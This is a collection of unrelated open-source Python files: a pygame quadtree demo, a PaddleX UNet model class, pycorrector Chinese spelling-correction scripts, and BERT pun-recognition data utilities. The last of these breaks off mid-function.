# drawRect(ROOT.SW)
# drawRect(ROOT.SE)
lst=[]
def drawRect(arg):
global lst
lst=[]
if arg:
x,y = arg
SIDE=200
rect(screen,GREEN,(x,y,SIDE,SIDE ),1)
cnt=U.Tree.query((x,y,x+SIDE,y+SIDE))
lst=U.Tree.getPointInRange((x,y,x+SIDE,y+SIDE))
# print(len(lst))
for p in lst:
p.intersect=True
# print(p.x,p.y)
cnt_text = font.render(str(cnt), 1, pygame.Color("coral"))
screen.blit(cnt_text, (WIDTH-50,0))
else:
for pos in lst:
x,y = pos
rect(screen,GREEN,(x,y,100,100 ),1)
def light(ROOT):
try:
NODE=ROOT.NE.SE
lst = NODE.Points
circle(screen,WHITE,(NODE.START[0],NODE.START[1]),10)
print(NODE.START,NODE.HIGHT,NODE.WIDTH)
for point in lst:
point.intersect=True
except Exception as e:
print(e)
U =Universe(100)
# p1=Point(x=HIGHT//2,y=WIDTH//2+100,vx=-5,mass=10)
# p2=Point(x=HIGHT//2,y=WIDTH//2-100,vx=5,mass=10)
# p3=Point(x=0,y=0,mass=5)
# U.allPoints.append(p1)
# U.allPoints.append(p2)
# U.allPoints.append(p3)
# U.allPoints.append(Point(x=10,y=250,vx=10,vy=10,mass=1))
RUN = True
angle=0
# lightup(U.Tree,False)
# lightup(U.Tree,False)
lst=[]
Inital_pos = (int(WIDTH/2),int(HIGHT))
while RUN:
screen.fill(DARKGRAY)
# time.sleep(0.1)
# screen.blit(update_fps(), (10,0))
for event in pygame.event.get():
if event.type == pygame.QUIT:
RUN=False
break
if event.type == pygame.MOUSEBUTTONUP:
# pass
pos = pygame.mouse.get_pos()
ox,oy = pos
print(pos,ox,oy)
# lst.append(pos)
# print(pos)
# U.addPoint(pos)
# lightup(U.Tree,False)
# light(U.Tree)
U.walk()
ox,oy =pygame.mouse.get_pos()
# U.gravity()
U.display()
U.collision()
t=time.time()
Tree = QuadTree(capacity=CAPACITY)
for p in U.allPoints:
Tree.insert(p)
U.Tree =Tree
# print(time.time()-t)
# for p in U.allPoints:
# p.intersect=False
# drawRect(pygame.mouse.get_pos())
# print(f"p1 {p1.x} {p1.x}")
# print(f"p2 {p2.x} {p2.x}")
clock.tick(60)
pygame.display.update()
``` |
{
"source": "joey12300/PaddleX",
"score": 2
} |
#### File: cv/models/unet.py
```python
from __future__ import absolute_import
import paddlex
from collections import OrderedDict
from .deeplabv3p import DeepLabv3p
class UNet(DeepLabv3p):
"""实现UNet网络的构建并进行训练、评估、预测和模型导出。
Args:
num_classes (int): 类别数。
upsample_mode (str): UNet decode时采用的上采样方式,取值为'bilinear'时利用双线行差值进行上菜样,
当输入其他选项时则利用反卷积进行上菜样,默认为'bilinear'。
use_bce_loss (bool): 是否使用bce loss作为网络的损失函数,只能用于两类分割。可与dice loss同时使用。默认False。
use_dice_loss (bool): 是否使用dice loss作为网络的损失函数,只能用于两类分割,可与bce loss同时使用。
当use_bce_loss和use_dice_loss都为False时,使用交叉熵损失函数。默认False。
class_weight (list/str): 交叉熵损失函数各类损失的权重。当class_weight为list的时候,长度应为
num_classes。当class_weight为str时, weight.lower()应为'dynamic',这时会根据每一轮各类像素的比重
自行计算相应的权重,每一类的权重为:每类的比例 * num_classes。class_weight取默认值None是,各类的权重1,
即平时使用的交叉熵损失函数。
ignore_index (int): label上忽略的值,label为ignore_index的像素不参与损失函数的计算。默认255。
Raises:
ValueError: use_bce_loss或use_dice_loss为真且num_calsses > 2。
ValueError: class_weight为list, 但长度不等于num_class。
class_weight为str, 但class_weight.low()不等于dynamic。
TypeError: class_weight不为None时,其类型不是list或str。
"""
def __init__(self,
num_classes=2,
upsample_mode='bilinear',
use_bce_loss=False,
use_dice_loss=False,
class_weight=None,
ignore_index=255):
self.init_params = locals()
super(DeepLabv3p, self).__init__('segmenter')
# dice loss and bce loss only apply to binary segmentation
if num_classes > 2 and (use_bce_loss or use_dice_loss):
raise ValueError(
"dice loss and bce loss is only applicable to binary classfication"
)
if class_weight is not None:
if isinstance(class_weight, list):
if len(class_weight) != num_classes:
raise ValueError(
"Length of class_weight should be equal to number of classes"
)
elif isinstance(class_weight, str):
if class_weight.lower() != 'dynamic':
raise ValueError(
"if class_weight is string, must be dynamic!")
else:
raise TypeError(
'Expect class_weight is a list or string but receive {}'.
format(type(class_weight)))
self.num_classes = num_classes
self.upsample_mode = upsample_mode
self.use_bce_loss = use_bce_loss
self.use_dice_loss = use_dice_loss
self.class_weight = class_weight
self.ignore_index = ignore_index
self.labels = None
self.fixed_input_shape = None
def build_net(self, mode='train'):
model = paddlex.cv.nets.segmentation.UNet(
self.num_classes,
mode=mode,
upsample_mode=self.upsample_mode,
use_bce_loss=self.use_bce_loss,
use_dice_loss=self.use_dice_loss,
class_weight=self.class_weight,
ignore_index=self.ignore_index,
fixed_input_shape=self.fixed_input_shape)
inputs = model.generate_inputs()
model_out = model.build_net(inputs)
outputs = OrderedDict()
if mode == 'train':
self.optimizer.minimize(model_out)
outputs['loss'] = model_out
else:
outputs['pred'] = model_out[0]
outputs['logit'] = model_out[1]
return inputs, outputs
def train(self,
num_epochs,
train_dataset,
train_batch_size=2,
eval_dataset=None,
save_interval_epochs=1,
log_interval_steps=2,
save_dir='output',
pretrain_weights='COCO',
optimizer=None,
learning_rate=0.01,
lr_decay_power=0.9,
use_vdl=False,
sensitivities_file=None,
eval_metric_loss=0.05,
early_stop=False,
early_stop_patience=5,
resume_checkpoint=None):
"""训练。
Args:
num_epochs (int): 训练迭代轮数。
train_dataset (paddlex.datasets): 训练数据读取器。
train_batch_size (int): 训练数据batch大小。同时作为验证数据batch大小。默认2。
eval_dataset (paddlex.datasets): 评估数据读取器。
save_interval_epochs (int): 模型保存间隔(单位:迭代轮数)。默认为1。
log_interval_steps (int): 训练日志输出间隔(单位:迭代次数)。默认为2。
save_dir (str): 模型保存路径。默认'output'。
pretrain_weights (str): 若指定为路径时,则加载路径下预训练模型;若为字符串'COCO',
则自动下载在COCO图片数据上预训练的模型权重;若为None,则不使用预训练模型。默认为'COCO'。
optimizer (paddle.fluid.optimizer): 优化器。当改参数为None时,使用默认的优化器:使用
fluid.optimizer.Momentum优化方法,polynomial的学习率衰减策略。
learning_rate (float): 默认优化器的初始学习率。默认0.01。
lr_decay_power (float): 默认优化器学习率多项式衰减系数。默认0.9。
use_vdl (bool): 是否使用VisualDL进行可视化。默认False。
sensitivities_file (str): 若指定为路径时,则加载路径下敏感度信息进行裁剪;若为字符串'DEFAULT',
则自动下载在Cityscapes图片数据上获得的敏感度信息进行裁剪;若为None,则不进行裁剪。默认为None。
eval_metric_loss (float): 可容忍的精度损失。默认为0.05。
early_stop (bool): 是否使用提前终止训练策略。默认值为False。
early_stop_patience (int): 当使用提前终止训练策略时,如果验证集精度在`early_stop_patience`个epoch内
连续下降或持平,则终止训练。默认值为5。
resume_checkpoint (str): 恢复训练时指定上次训练保存的模型路径。若为None,则不会恢复训练。默认值为None。
Raises:
ValueError: 模型从inference model进行加载。
"""
return super(UNet, self).train(
num_epochs, train_dataset, train_batch_size, eval_dataset,
save_interval_epochs, log_interval_steps, save_dir,
pretrain_weights, optimizer, learning_rate, lr_decay_power,
use_vdl, sensitivities_file, eval_metric_loss, early_stop,
early_stop_patience, resume_checkpoint)
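# A hedged end-to-end sketch in the PaddleX 1.x style (dataset paths and
# transform choices below are placeholders, not part of this file):
#
#     import paddlex as pdx
#     from paddlex.seg import transforms
#
#     train_transforms = transforms.Compose(
#         [transforms.Resize(512), transforms.Normalize()])
#     train_dataset = pdx.datasets.SegDataset(
#         data_dir='data', file_list='data/train_list.txt',
#         label_list='data/labels.txt', transforms=train_transforms)
#
#     model = pdx.seg.UNet(num_classes=2)
#     model.train(num_epochs=20, train_dataset=train_dataset,
#                 train_batch_size=4, learning_rate=0.01,
#                 save_dir='output/unet')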
``` |
{
"source": "joey12300/pycorrector",
"score": 3
} |
#### File: pycorrector/examples/evaluate_models.py
```python
import argparse
import os
import sys
sys.path.append("../")
import pycorrector
from pycorrector.utils import eval
pwd_path = os.path.abspath(os.path.dirname(__file__))
def demo():
idx_errors = pycorrector.detect('少先队员因该为老人让坐')
print(idx_errors)
def main(args):
if args.data == 'sighan_15' and args.model == 'rule':
demo()
# Sentence Level: acc:0.173225, precision:0.979592, recall:0.148541, f1:0.257965, cost time:230.92 s
eval.eval_sighan2015_by_model(pycorrector.correct)
if args.data == 'sighan_15' and args.model == 'bert':
# right_rate:0.37623762376237624, right_count:38, total_count:101;
# recall_rate:0.3645833333333333, recall_right_count:35, recall_total_count:96, spend_time:503 s
from pycorrector.bert.bert_corrector import BertCorrector
model = BertCorrector()
eval.eval_sighan2015_by_model(model.bert_correct)
if args.data == 'sighan_15' and args.model == 'macbert':
# Sentence Level: acc:0.914885, precision:0.995199, recall:0.916446, f1:0.954200, cost time:29.47 s
from pycorrector.macbert.macbert_corrector import MacBertCorrector
model = MacBertCorrector()
eval.eval_sighan2015_by_model(model.macbert_correct)
if args.data == 'sighan_15' and args.model == 'ernie':
# right_rate:0.297029702970297, right_count:30, total_count:101;
# recall_rate:0.28125, recall_right_count:27, recall_total_count:96, spend_time:655 s
from pycorrector.ernie.ernie_corrector import ErnieCorrector
model = ErnieCorrector()
eval.eval_sighan2015_by_model(model.ernie_correct)
if args.data == 'corpus500' and args.model == 'rule':
demo()
# right_rate:0.486, right_count:243, total_count:500;
# recall_rate:0.18, recall_right_count:54, recall_total_count:300, spend_time:78 s
eval.eval_corpus500_by_model(pycorrector.correct)
if args.data == 'corpus500' and args.model == 'bert':
# right_rate:0.586, right_count:293, total_count:500;
# recall_rate:0.35, recall_right_count:105, recall_total_count:300, spend_time:1760 s
from pycorrector.bert.bert_corrector import BertCorrector
model = BertCorrector()
eval.eval_corpus500_by_model(model.bert_correct)
if args.data == 'corpus500' and args.model == 'macbert':
# Sentence Level: acc:0.724000, precision:0.912821, recall:0.595318, f1:0.720648, cost time:6.43 s
from pycorrector.macbert.macbert_corrector import MacBertCorrector
model = MacBertCorrector()
eval.eval_corpus500_by_model(model.macbert_correct)
if args.data == 'corpus500' and args.model == 'ernie':
# right_rate:0.598, right_count:299, total_count:500;
# recall_rate:0.41333333333333333, recall_right_count:124, recall_total_count:300, spend_time:6960 s
from pycorrector.ernie.ernie_corrector import ErnieCorrector
model = ErnieCorrector()
eval.eval_corpus500_by_model(model.ernie_correct)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--data', type=str, default='sighan_15', help='evaluate dataset, sighan_15/corpus500')
parser.add_argument('--model', type=str, default='rule', help='which model to evaluate, rule/bert/macbert/ernie')
args = parser.parse_args()
main(args)
```
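The two flags above combine freely; a couple of representative invocations (assuming the script is run from the `examples/` directory of the repo):
```python
# Rule-based corrector on the SIGHAN-15 set (the default combination):
#   python evaluate_models.py --data sighan_15 --model rule
# MacBERT corrector on the 500-sentence corpus:
#   python evaluate_models.py --data corpus500 --model macbert
```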
#### File: pycorrector/deepcontext/preprocess.py
```python
import os
import sys
from xml.dom import minidom
sys.path.append('../..')
from pycorrector.utils.tokenizer import segment
from pycorrector.deepcontext import config
def parse_xml_file(path, use_segment, segment_type):
print('Parse data from %s' % path)
word_arr = []
dom_tree = minidom.parse(path)
docs = dom_tree.documentElement.getElementsByTagName('DOC')
for doc in docs:
# Input the text
text = doc.getElementsByTagName('CORRECTION')[0]. \
childNodes[0].data.strip()
# Segment
word_seq = ' '.join(segment(text.strip(), cut_type=segment_type)) if use_segment else text.strip()
word_arr.append(word_seq)
return word_arr
def get_data_file(path, use_segment, segment_type):
data_list = []
with open(path, 'r', encoding='utf-8') as f:
for line in f:
line = line.strip()
if line.startswith("#"):
continue
parts = line.split("\t")
if len(parts) != 2:
continue
target = ' '.join(segment(parts[1].strip(), cut_type=segment_type)) if use_segment else parts[1].strip()
data_list.append(target)
return data_list
def save_corpus_data(data_list, data_path):
dirname = os.path.dirname(data_path)
os.makedirs(dirname, exist_ok=True)
with open(data_path, 'w', encoding='utf-8') as f:
count = 0
for line in data_list:
f.write(line + '\n')
count += 1
print("save line size:%d to %s" % (count, data_path))
if __name__ == '__main__':
# train data
data_list = []
if config.dataset == 'sighan':
data = get_data_file(config.sighan_train_path, config.use_segment, config.segment_type)
data_list.extend(data)
else:
for path in config.cged_train_paths:
data_list.extend(parse_xml_file(path, config.use_segment, config.segment_type))
# save data
save_corpus_data(data_list, config.train_path)
```
#### File: pycorrector/macbert/infer.py
```python
import sys
import operator
import torch
from transformers import BertTokenizer
sys.path.append('../..')
from pycorrector.macbert.macbert4csc import MacBert4Csc
from pycorrector.macbert.softmaskedbert4csc import SoftMaskedBert4Csc
from pycorrector.macbert.defaults import _C as cfg
from pycorrector.utils.logger import logger
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
class Inference:
def __init__(self, ckpt_path='output/macbert4csc/epoch=09-val_loss=0.01.ckpt',
vocab_path='output/macbert4csc/vocab.txt',
cfg_path='train_macbert4csc.yml'):
logger.debug("device: {}".format(device))
self.tokenizer = BertTokenizer.from_pretrained(vocab_path)
cfg.merge_from_file(cfg_path)
if 'macbert4csc' in cfg_path:
self.model = MacBert4Csc.load_from_checkpoint(checkpoint_path=ckpt_path,
cfg=cfg,
map_location=device,
tokenizer=self.tokenizer)
elif 'softmaskedbert4csc' in cfg_path:
self.model = SoftMaskedBert4Csc.load_from_checkpoint(checkpoint_path=ckpt_path,
cfg=cfg,
map_location=device,
tokenizer=self.tokenizer)
else:
raise ValueError("model not found.")
self.model.eval()
self.model.to(device)
logger.debug("device: {}".format(device))
def predict(self, sentence_list):
"""
Text-correction model inference.
Args:
sentence_list: list
list of input texts
Returns: tuple
corrected_texts(list)
"""
is_str = False
if isinstance(sentence_list, str):
is_str = True
sentence_list = [sentence_list]
corrected_texts = self.model.predict(sentence_list)
if is_str:
return corrected_texts[0]
return corrected_texts
def predict_with_error_detail(self, sentence_list):
"""
Text-correction model inference, also returning error-position details.
Args:
sentence_list: list
list of input texts
Returns: tuple
corrected_texts(list), details(list)
"""
details = []
is_str = False
if isinstance(sentence_list, str):
is_str = True
sentence_list = [sentence_list]
corrected_texts = self.model.predict(sentence_list)
def get_errors(corrected_text, origin_text):
sub_details = []
for i, ori_char in enumerate(origin_text):
if ori_char in [' ', '“', '”', '‘', '’', '琊', '\n', '…', '—', '擤']:
# add unk word
corrected_text = corrected_text[:i] + ori_char + corrected_text[i:]
continue
if i >= len(corrected_text):
continue
if ori_char != corrected_text[i]:
if ori_char.lower() == corrected_text[i]:
# pass english upper char
corrected_text = corrected_text[:i] + ori_char + corrected_text[i + 1:]
continue
sub_details.append((ori_char, corrected_text[i], i, i + 1))
sub_details = sorted(sub_details, key=operator.itemgetter(2))
return corrected_text, sub_details
for corrected_text, text in zip(corrected_texts, sentence_list):
corrected_text, sub_details = get_errors(corrected_text, text)
details.append(sub_details)
if is_str:
return corrected_texts[0], details[0]
return corrected_texts, details
if __name__ == "__main__":
ckpt_path = sys.argv[1]
vocab_path = sys.argv[2]
cfg_path = sys.argv[3]
m = Inference(ckpt_path,
vocab_path,
cfg_path)
inputs = [
'它的本领是呼风唤雨,因此能灭火防灾。狎鱼后面是獬豸。獬豸通常头上长着独角,有时又被称为独角羊。它很聪彗,而且明辨是非,象征着大公无私,又能镇压斜恶。',
'老是较书。',
'感谢等五分以后,碰到一位很棒的奴生跟我可聊。',
'遇到一位很棒的奴生跟我聊天。',
'遇到一位很美的女生跟我疗天。',
'他们只能有两个选择:接受降新或自动离职。',
'王天华开心得一直说话。',
'你说:“怎么办?”我怎么知道?',
]
outputs = m.predict(inputs)
for a, b in zip(inputs, outputs):
print('input :', a)
print('predict:', b)
print()
# Evaluate the models on the SIGHAN-2015 dataset
# macbert4csc Sentence Level: acc:0.7845, precision:0.8174, recall:0.7256, f1:0.7688, cost time:10.79 s
# softmaskedbert4csc Sentence Level: acc:0.6964, precision:0.8065, recall:0.5064, f1:0.6222, cost time:16.20 s
from pycorrector.utils.eval import eval_sighan2015_by_model
eval_sighan2015_by_model(m.predict_with_error_detail)
```
#### File: pycorrector/macbert/reader.py
```python
import os
import json
import torch
from torch.utils.data import Dataset
from torch.utils.data import DataLoader
class DataCollator:
def __init__(self, tokenizer):
self.tokenizer = tokenizer
def __call__(self, data):
ori_texts, cor_texts, wrong_idss = zip(*data)
encoded_texts = [self.tokenizer.tokenize(t) for t in ori_texts]
max_len = max([len(t) for t in encoded_texts]) + 2
det_labels = torch.zeros(len(ori_texts), max_len).long()
for i, (encoded_text, wrong_ids) in enumerate(zip(encoded_texts, wrong_idss)):
for idx in wrong_ids:
margins = []
for word in encoded_text[:idx]:
if word == '[UNK]':
break
if word.startswith('##'):
margins.append(len(word) - 3)
else:
margins.append(len(word) - 1)
margin = sum(margins)
move = 0
while (abs(move) < margin) or (idx + move >= len(encoded_text)) \
or encoded_text[idx + move].startswith('##'):
move -= 1
det_labels[i, idx + move + 1] = 1
return ori_texts, cor_texts, det_labels
class CscDataset(Dataset):
def __init__(self, file_path):
self.data = json.load(open(file_path, 'r', encoding='utf-8'))
def __len__(self):
return len(self.data)
def __getitem__(self, index):
return self.data[index]['original_text'], self.data[index]['correct_text'], self.data[index]['wrong_ids']
def make_loaders(collate_fn, train_path='', valid_path='', test_path='',
batch_size=32, num_workers=4):
train_loader = None
if train_path and os.path.exists(train_path):
train_loader = DataLoader(CscDataset(train_path),
batch_size=batch_size,
shuffle=False,
num_workers=num_workers,
collate_fn=collate_fn)
valid_loader = None
if valid_path and os.path.exists(valid_path):
valid_loader = DataLoader(CscDataset(valid_path),
batch_size=batch_size,
num_workers=num_workers,
collate_fn=collate_fn)
test_loader = None
if test_path and os.path.exists(test_path):
test_loader = DataLoader(CscDataset(test_path),
batch_size=batch_size,
num_workers=num_workers,
collate_fn=collate_fn)
return train_loader, valid_loader, test_loader
```
#### File: pycorrector/transformer/preprocess.py
```python
import os
import sys
from codecs import open
from xml.dom import minidom
from sklearn.model_selection import train_test_split
sys.path.append('../..')
from pycorrector.utils.tokenizer import segment
from pycorrector.transformer import config
def parse_xml_file(path):
print('Parse data from %s' % path)
data_list = []
dom_tree = minidom.parse(path)
docs = dom_tree.documentElement.getElementsByTagName('DOC')
for doc in docs:
# Input the text
text = doc.getElementsByTagName('TEXT')[0]. \
childNodes[0].data.strip()
# Input the correct text
correction = doc.getElementsByTagName('CORRECTION')[0]. \
childNodes[0].data.strip()
source = segment(text.strip(), cut_type='char')
target = segment(correction.strip(), cut_type='char')
pair = [source, target]
if pair not in data_list:
data_list.append(pair)
return data_list
def save_data(data_list, src_data_path, trg_data_path):
with open(src_data_path, 'w', encoding='utf-8') as f1, \
open(trg_data_path, 'w', encoding='utf-8') as f2:
count = 0
for src, dst in data_list:
f1.write(' '.join(src) + '\n')
f2.write(' '.join(dst) + '\n')
count += 1
print("save line size:%d" % count)
def gen_fairseq_data(source_lang,
target_lang,
trainpref,
validpref,
nwordssrc,
nwordstgt,
destdir,
joined_dictionary
):
from fairseq import options
from fairseq_cli import preprocess
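# build the same argument namespace that the fairseq-preprocess CLI would parse,
# then invoke its main() directly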
parser = options.get_preprocessing_parser()
args = parser.parse_args()
args.source_lang = source_lang
args.target_lang = target_lang
args.trainpref = trainpref
args.validpref = validpref
args.nwordssrc = nwordssrc
args.nwordstgt = nwordstgt
args.destdir = destdir
args.joined_dictionary = joined_dictionary
preprocess.main(args)
if __name__ == '__main__':
# if exist download big data, only generate fairseq data
if not os.path.exists(config.train_src_path):
# not exist big data, generate toy train data
data_list = []
for path in config.raw_train_paths:
data_list.extend(parse_xml_file(path))
train_lst, val_lst = train_test_split(data_list, test_size=0.1)
save_data(train_lst, config.train_src_path, config.train_trg_path)
save_data(val_lst, config.val_src_path, config.val_trg_path)
# generate fairseq format data with prepared train data
gen_fairseq_data(config.train_src_path.split('.')[-1],
config.train_trg_path.split('.')[-1],
config.trainpref,
config.valpref,
config.vocab_max_size,
config.vocab_max_size,
config.data_bin_dir,
config.joined_dictionary
)
``` |
{
"source": "joey1993/pun-recognition",
"score": 3
} |
#### File: joey1993/pun-recognition/bert_utils.py
```python
import csv
import logging
import sys
import numpy as np
import os
import random
import pickle
from sklearn.metrics import f1_score
from sklearn.metrics import recall_score
from sklearn.metrics import precision_score
import json
np.random.seed(2019)
logging.basicConfig(format = '%(asctime)s - %(levelname)s - %(name)s - %(message)s',
datefmt = '%m/%d/%Y %H:%M:%S',
level = logging.INFO)
logger = logging.getLogger(__name__)
class InputExample(object):
"""A single training/test example for simple sequence classification."""
def __init__(self, guid, text_a, text_b=None, label=None, prons=None):
"""Constructs a InputExample.
Args:
guid: Unique id for the example.
text_a: string. The untokenized text of the first sequence. For single
sequence tasks, only this sequence must be specified.
text_b: (Optional) string. The untokenized text of the second sequence.
Only must be specified for sequence pair tasks.
label: (Optional) string. The label of the example. This should be
specified for train and dev examples, but not for test examples.
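prons: (Optional) list. Pronunciation features aligned with the words of text_a.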
"""
self.guid = guid
self.text_a = text_a
self.text_b = text_b
self.label = label
self.prons = prons
class InputFeatures(object):
"""A single set of features of data."""
def __init__(self, input_ids, input_mask, segment_ids, label_id):
self.input_ids = input_ids
self.input_mask = input_mask
self.segment_ids = segment_ids
self.label_id = label_id
class InputPronFeatures(object):
"""A single set of features of data."""
def __init__(self, input_ids, input_mask, segment_ids, label_id, prons_id, prons_att_mask):
self.input_ids = input_ids
self.input_mask = input_mask
self.segment_ids = segment_ids
self.label_id = label_id
self.prons_id = prons_id
self.prons_att_mask = prons_att_mask
def readfile(filename):
'''
read a whitespace-separated, pronunciation-tagged file where each data line is
"<word> <label> <pron1,pron2,...>" and sentences are separated by blank lines.
return format :
[ (['EU', 'rejects', ...], ['B-ORG', 'O', ...], [[...prons...], ...]), ... ] i.e. a list of (words, labels, prons) tuples
'''
f = open(filename,encoding='utf-8')
data = []
sentence = []
label= []
prons = []
for line in f:
if len(line)==0 or line.startswith('-DOCSTART') or line[0]=="\n":
if len(sentence) > 0:
data.append((sentence,label,prons))
sentence = []
label = []
prons = []
continue
splits = line.split(' ')
sentence.append(splits[0])
label.append(splits[-2])
prons.append(splits[-1][:-1].split(','))
if len(sentence) >0:
data.append((sentence,label,prons))
sentence = []
label = []
prons = []
return data
class DataProcessor(object):
"""Base class for data converters for sequence classification data sets."""
def get_train_examples(self, data_dir):
"""Gets a collection of `InputExample`s for the train set."""
raise NotImplementedError()
def get_dev_examples(self, data_dir):
"""Gets a collection of `InputExample`s for the dev set."""
raise NotImplementedError()
def get_labels(self):
"""Gets the list of labels for this data set."""
raise NotImplementedError()
@classmethod
def _read_csv(cls, input_file, quotechar=None):
"""Reads a tab separated value file."""
return readfile(input_file)
@classmethod
def _read_tsv(cls, input_file, quotechar=None):
"""Reads a tab separated value file."""
with open(input_file, "r", encoding='utf-8') as f:
reader = csv.reader(f, delimiter="\t", quotechar=quotechar)
lines = []
for line in reader:
if sys.version_info[0] == 2:
line = list(unicode(cell, 'utf-8') for cell in line)
lines.append(line)
return lines
class NerProcessor(DataProcessor):
"""Processor for the CoNLL-2003 data set."""
def get_train_examples(self, data_dir):
"""See base class."""
return self._create_examples(
self._read_csv(os.path.join(data_dir, "train.txt")), "train")
def get_dev_examples(self, data_dir):
"""See base class."""
return self._create_examples(
self._read_csv(os.path.join(data_dir, "valid.txt")), "dev")
def get_test_examples(self, data_dir):
"""See base class."""
return self._create_examples(
self._read_csv(os.path.join(data_dir, "test.txt")), "test")
def get_labels(self):
#return ["O", "B-MISC", "I-MISC", "B-PER", "I-PER", "B-ORG", "I-ORG", "B-LOC", "I-LOC", "X", "[CLS]", "[SEP]"]
return ["O", "P", "X", "[CLS]", "[SEP]"]
def _create_examples(self,lines,set_type):
examples = []
for i,(sentence,label,prons) in enumerate(lines):
guid = "%s-%s" % (set_type, i)
text_a = ' '.join(sentence)
text_b = None
label = label
prons = prons
examples.append(InputExample(guid=guid,text_a=text_a,text_b=text_b,label=label,prons=prons))
return examples
class ScProcessor(DataProcessor):
"""Processor for the Sentence Classification data set."""
def get_train_examples(self, data_dir):
"""See base class."""
return self._create_examples(
self._read_tsv(os.path.join(data_dir, "train.tsv")), "train")
def get_labels(self):
"""See base class."""
return ["0", "1"]
def _create_examples(self, lines, set_type):
"""Creates examples for the training and dev sets."""
examples = []
for (i, line) in enumerate(lines):
if i == 0:
continue
guid = "%s-%s" % (set_type, i)
text_a = line[1]
text_b = None
prons = line[2]
label = line[0]
if label == "-1": label = "0"
examples.append(InputExample(guid=guid, text_a=text_a, text_b=text_b, prons=prons, label=label))
return examples
processors = {"ner":NerProcessor,
"sc":ScProcessor}
def convert_examples_to_features(examples, label_list, max_seq_length, tokenizer):
"""Loads a data file into a list of `InputBatch`s."""
label_map = {label : i for i, label in enumerate(label_list,1)}
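# label ids start at 1 so that id 0 can be used for padded positions below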
features = []
for (ex_index,example) in enumerate(examples):
textlist = example.text_a.split(' ')
labellist = example.label
tokens = []
labels = []
for i, word in enumerate(textlist):
token = tokenizer.tokenize(word)
tokens.extend(token)
label_1 = labellist[i]
for m in range(len(token)):
if m == 0:
labels.append(label_1)
else:
labels.append("X")
if len(tokens) >= max_seq_length - 1:
tokens = tokens[0:(max_seq_length - 2)]
labels = labels[0:(max_seq_length - 2)]
ntokens = []
segment_ids = []
label_ids = []
ntokens.append("[CLS]")
segment_ids.append(0)
label_ids.append(label_map["[CLS]"])
for i, token in enumerate(tokens):
ntokens.append(token)
segment_ids.append(0)
label_ids.append(label_map[labels[i]])
ntokens.append("[SEP]")
segment_ids.append(0)
label_ids.append(label_map["[SEP]"])
input_ids = tokenizer.convert_tokens_to_ids(ntokens)
input_mask = [1] * len(input_ids)
while len(input_ids) < max_seq_length:
input_ids.append(0)
input_mask.append(0)
segment_ids.append(0)
label_ids.append(0)
assert len(input_ids) == max_seq_length
assert len(input_mask) == max_seq_length
assert len(segment_ids) == max_seq_length
assert len(label_ids) == max_seq_length
if ex_index < 5:
logger.info("*** Example ***")
logger.info("guid: %s" % (example.guid))
logger.info("tokens: %s" % " ".join(
[str(x) for x in tokens]))
logger.info("input_ids: %s" % " ".join([str(x) for x in input_ids]))
logger.info("input_mask: %s" % " ".join([str(x) for x in input_mask]))
logger.info(
"segment_ids: %s" % " ".join([str(x) for x in segment_ids]))
# logger.info("label: %s (id = %d)" % (example.label, label_ids))
features.append(
InputFeatures(input_ids=input_ids,
input_mask=input_mask,
segment_ids=segment_ids,
label_id=label_ids))
return features
def convert_examples_to_pron_features(examples, label_list, max_seq_length, max_pron_length, tokenizer, prons_map):
"""Loads a data file into a list of `InputBatch`s."""
label_map = {label : i for i, label in enumerate(label_list,1)}
features = []
for (ex_index,example) in enumerate(examples):
textlist = example.text_a.split(' ')
labellist = example.label
pronslist = example.prons
tokens = []
labels = []
prons = []
prons_mask = []
for i, word in enumerate(textlist):
token = tokenizer.tokenize(word)
tokens.extend(token)
label_1 = labellist[i]
pron_1 = pronslist[i] # the complete prons of a word
pron_2 = [] # save the ids of prons of a word
for j in range(len(pron_1)):
index = len(prons_map) # expand the map with new prons
if pron_1[j] not in prons_map:
prons_map[pron_1[j]] = index + 1
pron_2.append(prons_map[pron_1[j]])
pron_mask_2 = [1] * len(pron_2)
if len(pron_2) >= max_pron_length:
pron_2 = pron_2[0:max_pron_length] # trunk it if too long
pron_mask_2 = pron_mask_2[0:max_pron_length]
else:
pron_2 += [0] * (max_pron_length - len(pron_2)) # pad it if too short
pron_mask_2 += [0] * (max_pron_length - len(pron_mask_2))
for m in range(len(token)):
if m == 0:
labels.append(label_1)
prons.append(pron_2) # only send the prons to the first piece_token of a word
prons_mask.append(pron_mask_2)
else:
labels.append("X")
prons.append([0] * max_pron_length) # pad other piece_token with 0's
prons_mask.append([0] * max_pron_length)
if len(tokens) >= max_seq_length - 1:
tokens = tokens[0:(max_seq_length - 2)]
labels = labels[0:(max_seq_length - 2)]
prons = prons[0:(max_seq_length - 2)]
prons_mask = prons_mask[0:(max_seq_length - 2)]
ntokens = []
segment_ids = []
label_ids = []
prons_ids = []
prons_att_mask = []
ntokens.append("[CLS]")
segment_ids.append(0)
label_ids.append(label_map["[CLS]"])
prons_ids.append([0] * max_pron_length) # pad the cls with 0's
prons_att_mask.append([0] * max_pron_length)
for i, token in enumerate(tokens):
ntokens.append(token)
segment_ids.append(0)
label_ids.append(label_map[labels[i]])
prons_ids.append(prons[i])
prons_att_mask.append(prons_mask[i])
ntokens.append("[SEP]")
segment_ids.append(0)
label_ids.append(label_map["[SEP]"])
prons_ids.append([0] * max_pron_length) # pad the sep with 0's
prons_att_mask.append([0] * max_pron_length)
input_ids = tokenizer.convert_tokens_to_ids(ntokens)
input_mask = [1] * len(input_ids)
while len(input_ids) < max_seq_length:
input_ids.append(0)
input_mask.append(0)
segment_ids.append(0)
label_ids.append(0)
prons_ids.append([0] * max_pron_length)
prons_att_mask.append([0] * max_pron_length)
assert len(input_ids) == max_seq_length
assert len(input_mask) == max_seq_length
assert len(segment_ids) == max_seq_length
assert len(label_ids) == max_seq_length
assert len(prons_ids) == max_seq_length
assert len(prons_att_mask) == max_seq_length
if ex_index < 0:
logger.info("*** Example ***")
logger.info("guid: %s" % (example.guid))
logger.info("tokens: %s" % " ".join(
[str(x) for x in tokens]))
logger.info("input_ids: %s" % " ".join([str(x) for x in input_ids]))
logger.info("input_mask: %s" % " ".join([str(x) for x in input_mask]))
logger.info("segment_ids: %s" % " ".join([str(x) for x in segment_ids]))
logger.info("label_ids: %s" % " ".join([str(x) for x in label_ids]))
logger.info("prons_ids: %s" % " ".join([str(x) for x in prons_ids]))
logger.info("prons_att_mask: %s" % " ".join([str(x) for x in prons_att_mask]))
logger.info("prons_map: %s" % str(prons_map))
# logger.info("label: %s (id = %d)" % (example.label, label_ids))
features.append(
InputPronFeatures(input_ids=input_ids,
